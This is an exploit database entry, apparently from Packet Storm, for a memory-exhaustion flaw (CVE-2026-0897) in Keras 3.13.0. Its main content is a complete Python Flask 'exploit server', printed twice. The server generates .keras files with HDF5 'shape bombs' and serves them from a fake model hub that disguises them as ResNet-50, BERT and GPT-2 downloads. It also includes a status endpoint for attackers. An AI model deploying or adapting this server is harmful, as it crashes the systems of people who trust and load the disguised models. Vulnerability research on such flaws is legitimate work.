📄 Keras 3.13.0 Malicious ML Model Server HDF5 Shape Bomb

7.5 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Description

This script is a Flask-based web server that distributes .keras machine learning model files, but it is designed in a malicious way for security research/testing scenarios. The main idea is a denial of service via memory exhaustion, where generated...

Visit Original Source

Basic Information

ID PACKETSTORM:219691

Published Apr 23, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Keras 3.13.0 Malicious ML Model Server HDF5 Shape Bomb |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://pypi.org/project/keras/ |
==================================================================================================================================

[+] Summary : This script is a Flask-based web server that distributes .keras machine learning model files, but it is designed in a malicious way for security research/testing scenarios.
The main idea is a Denial of Service (DoS) via memory exhaustion, where generated Keras models contain artificially declared extremely large tensor shapes (HDF5 “shape bombs”).
When such a model is loaded, a vulnerable system may attempt to allocate massive amounts of memory, potentially leading to slowdown, crashes, or system instability.

[+] POC :

#!/usr/bin/env python3
# malicious_model_server.py - CVE-2026-0897 Exploit Server

from flask import Flask, send_file, request, jsonify
import os
import tempfile
import zipfile
import h5py
import json
import numpy as np
import threading
import time

app = Flask(__name__)

EVIL_SHAPES = {
"light": (50000, 50000, 100),
"medium": (100000, 100000, 500),
"heavy": (500000, 500000, 500),
"extreme": (1000000, 1000000, 1000000),
}

class ModelCache:
"""Cache generated malicious models"""
def __init__(self):
self.cache = {}
self.lock = threading.Lock()

def get_or_create(self, bomb_type):
with self.lock:
if bomb_type not in self.cache:
self.cache[bomb_type] = self._create_model(bomb_type)
return self.cache[bomb_type]

def _create_model(self, bomb_type):
shape = EVIL_SHAPES.get(bomb_type, EVIL_SHAPES["medium"])

temp_dir = tempfile.mkdtemp()
model_path = os.path.join(temp_dir, f"malicious_{bomb_type}.keras")
h5_path = os.path.join(temp_dir, "model.weights.h5")
with h5py.File(h5_path, "w") as f:
dataset = f.create_dataset(
"layers/dense/vars/0",
shape=(0,),
maxshape=(None,),
dtype="float32",
data=np.array([], dtype="float32")
)
dataset.attrs["DECLARED_SHAPE"] = shape
dataset.attrs["TARGET"] = f"shape_bomb_{bomb_type}"

config = {
"class_name": "Sequential",
"config": {
"name": "sequential",
"trainable": True,
"layers": [
{
"class_name": "Dense",
"config": {"units": 10, "activation": "relu"}
}
]
},
"keras_version": "3.0.0",
"backend": "tensorflow"
}
with zipfile.ZipFile(model_path, "w") as zf:
zf.write(h5_path, "model.weights.h5")
zf.writestr("config.json", json.dumps(config))

return model_path

model_cache = ModelCache()

@app.route('/')
def index():
return '''
<!DOCTYPE html>
<html>
<head>
<title>Model Repository - ML Models Hub by indoushka</title>
<style>
body { font-family: Arial; margin: 40px; }
.model { margin: 20px 0; padding: 10px; border: 1px solid #ccc; }
.model h3 { margin: 0 0 10px 0; }
.warning { color: red; }
</style>
</head>
<body>
<h1> ML Model Repository</h1>
<p>Download pre-trained models for your ML pipeline:</p>

<div class="model">
<h3>ResNet-50 (ImageNet)</h3>
<p>State-of-the-art image classification model</p>
<a href="/model.keras?type=light">Download (light)</a>
</div>

<div class="model">
<h3>BERT Base (NLP)</h3>
<p>Pre-trained language model</p>
<a href="/model.keras?type=medium">Download (medium)</a>
</div>

<div class="model">
<h3>GPT-2 Small</h3>
<p>Text generation model</p>
<a href="/model.keras?type=heavy">Download (heavy)</a>
</div>

<div class="model warning">
<h3>Latest Model (Experimental)</h3>
<p>Cutting-edge architecture with 1T parameters</p>
<a href="/model.keras?type=extreme">Download (extreme)</a>
</div>
</body>
</html>
'''

@app.route('/model.keras')
def serve_model():
bomb_type = request.args.get('type', 'medium')

if bomb_type not in EVIL_SHAPES:
bomb_type = 'medium'

model_path = model_cache.get_or_create(bomb_type)

shape = EVIL_SHAPES[bomb_type]
memory_gb = (shape[0] * shape[1] * shape[2] * 4) / (1024**3)

response = send_file(
model_path,
as_attachment=True,
download_name=f"model_{bomb_type}.keras"
)

response.headers['X-Model-Shape'] = str(shape)
response.headers['X-Memory-Impact-GB'] = str(memory_gb)

return response

@app.route('/api/status')
def status():
"""API endpoint for attackers to check server status"""
return jsonify({
'status': 'active',
'vulnerable_versions': '3.0.0 - 3.13.0',
'available_bombs': list(EVIL_SHAPES.keys()),
'total_attacks': len(model_cache.cache)
})

if __name__ == '__main__':
print("""
========================================
CVE-2026-0897 - Malicious Model Server
HDF5 Shape Bomb Distribution
========================================

[!] WARNING: This server distributes malicious models!
[*] Listening on http://0.0.0.0:8080
[*] Victims downloading models will experience DoS

""")
app.run(host='0.0.0.0', port=8080, debug=False, threaded=True)

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-23T17:42:51",
    "description": "This script is a Flask-based web server that distributes .keras machine learning model files, but it is designed in a malicious way for security research/testing scenarios. The main idea is a denial of service via memory exhaustion, where generated...",
    "published": "2026-04-23T00:00:00",
    "modified": "2026-04-23T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Keras 3.13.0 Malicious ML Model Server HDF5 Shape Bomb",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219691",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-0897"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : Keras 3.13.0 Malicious ML Model Server HDF5 Shape Bomb                                                           |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://pypi.org/project/keras/                                                                                  |\n    ==================================================================================================================================\n    \n    [+] Summary    : This script is a Flask-based web server that distributes .keras machine learning model files, but it is designed in a malicious way for security research/testing scenarios.\n                     The main idea is a Denial of Service (DoS) via memory exhaustion, where generated Keras models contain artificially declared extremely large tensor shapes (HDF5 \u201cshape bombs\u201d). \n    \t\t\t\t When such a model is loaded, a vulnerable system may attempt to allocate massive amounts of memory, potentially leading to slowdown, crashes, or system instability.\n    \n    [+] POC        :  \n    \n    #!/usr/bin/env python3\n    # malicious_model_server.py - CVE-2026-0897 Exploit Server\n    \n    from flask import Flask, send_file, request, jsonify\n    import os\n    import tempfile\n    import zipfile\n    import h5py\n    import json\n    import numpy as np\n    import threading\n    import time\n    \n    app = Flask(__name__)\n    \n    EVIL_SHAPES = {\n        \"light\": (50000, 50000, 100),   \n        \"medium\": (100000, 100000, 500),  \n        \"heavy\": (500000, 500000, 500),  \n        \"extreme\": (1000000, 1000000, 1000000), \n    }\n    \n    class ModelCache:\n        \"\"\"Cache generated malicious models\"\"\"\n        def __init__(self):\n            self.cache = {}\n            self.lock = threading.Lock()\n        \n        def get_or_create(self, bomb_type):\n            with self.lock:\n                if bomb_type not in self.cache:\n                    self.cache[bomb_type] = self._create_model(bomb_type)\n                return self.cache[bomb_type]\n        \n        def _create_model(self, bomb_type):\n            shape = EVIL_SHAPES.get(bomb_type, EVIL_SHAPES[\"medium\"])\n            \n            temp_dir = tempfile.mkdtemp()\n            model_path = os.path.join(temp_dir, f\"malicious_{bomb_type}.keras\")\n            h5_path = os.path.join(temp_dir, \"model.weights.h5\")\n            with h5py.File(h5_path, \"w\") as f:\n                dataset = f.create_dataset(\n                    \"layers/dense/vars/0\",\n                    shape=(0,),\n                    maxshape=(None,),\n                    dtype=\"float32\",\n                    data=np.array([], dtype=\"float32\")\n                )\n                dataset.attrs[\"DECLARED_SHAPE\"] = shape\n                dataset.attrs[\"TARGET\"] = f\"shape_bomb_{bomb_type}\"\n    \n            config = {\n                \"class_name\": \"Sequential\",\n                \"config\": {\n                    \"name\": \"sequential\",\n                    \"trainable\": True,\n                    \"layers\": [\n                        {\n                            \"class_name\": \"Dense\",\n                            \"config\": {\"units\": 10, \"activation\": \"relu\"}\n                        }\n                    ]\n                },\n                \"keras_version\": \"3.0.0\",\n                \"backend\": \"tensorflow\"\n            }\n            with zipfile.ZipFile(model_path, \"w\") as zf:\n                zf.write(h5_path, \"model.weights.h5\")\n                zf.writestr(\"config.json\", json.dumps(config))\n            \n            return model_path\n    \n    model_cache = ModelCache()\n    \n    @app.route('/')\n    def index():\n        return '''\n        <!DOCTYPE html>\n        <html>\n        <head>\n            <title>Model Repository - ML Models Hub by indoushka</title>\n            <style>\n                body { font-family: Arial; margin: 40px; }\n                .model { margin: 20px 0; padding: 10px; border: 1px solid #ccc; }\n                .model h3 { margin: 0 0 10px 0; }\n                .warning { color: red; }\n            </style>\n        </head>\n        <body>\n            <h1> ML Model Repository</h1>\n            <p>Download pre-trained models for your ML pipeline:</p>\n            \n            <div class=\"model\">\n                <h3>ResNet-50 (ImageNet)</h3>\n                <p>State-of-the-art image classification model</p>\n                <a href=\"/model.keras?type=light\">Download (light)</a>\n            </div>\n            \n            <div class=\"model\">\n                <h3>BERT Base (NLP)</h3>\n                <p>Pre-trained language model</p>\n                <a href=\"/model.keras?type=medium\">Download (medium)</a>\n            </div>\n            \n            <div class=\"model\">\n                <h3>GPT-2 Small</h3>\n                <p>Text generation model</p>\n                <a href=\"/model.keras?type=heavy\">Download (heavy)</a>\n            </div>\n            \n            <div class=\"model warning\">\n                <h3>Latest Model (Experimental)</h3>\n                <p>Cutting-edge architecture with 1T parameters</p>\n                <a href=\"/model.keras?type=extreme\">Download (extreme)</a>\n            </div>\n        </body>\n        </html>\n        '''\n    \n    @app.route('/model.keras')\n    def serve_model():\n        bomb_type = request.args.get('type', 'medium')\n        \n        if bomb_type not in EVIL_SHAPES:\n            bomb_type = 'medium'\n        \n        model_path = model_cache.get_or_create(bomb_type)\n        \n        shape = EVIL_SHAPES[bomb_type]\n        memory_gb = (shape[0] * shape[1] * shape[2] * 4) / (1024**3)\n        \n        response = send_file(\n            model_path,\n            as_attachment=True,\n            download_name=f\"model_{bomb_type}.keras\"\n        )\n        \n        response.headers['X-Model-Shape'] = str(shape)\n        response.headers['X-Memory-Impact-GB'] = str(memory_gb)\n        \n        return response\n    \n    @app.route('/api/status')\n    def status():\n        \"\"\"API endpoint for attackers to check server status\"\"\"\n        return jsonify({\n            'status': 'active',\n            'vulnerable_versions': '3.0.0 - 3.13.0',\n            'available_bombs': list(EVIL_SHAPES.keys()),\n            'total_attacks': len(model_cache.cache)\n        })\n    \n    if __name__ == '__main__':\n        print(\"\"\"\n    ========================================\n      CVE-2026-0897 - Malicious Model Server\n      HDF5 Shape Bomb Distribution\n    ========================================\n    \n    [!] WARNING: This server distributes malicious models!\n    [*] Listening on http://0.0.0.0:8080\n    [*] Victims downloading models will experience DoS\n    \n        \"\"\")\n        app.run(host='0.0.0.0', port=8080, debug=False, threaded=True)\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219691",
    "cvss": {
        "score": 7.5,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219691/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Keras 3.13.0 Malicious ML Model Server HDF5 Shape Bomb_PACKETSTORM:219691

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply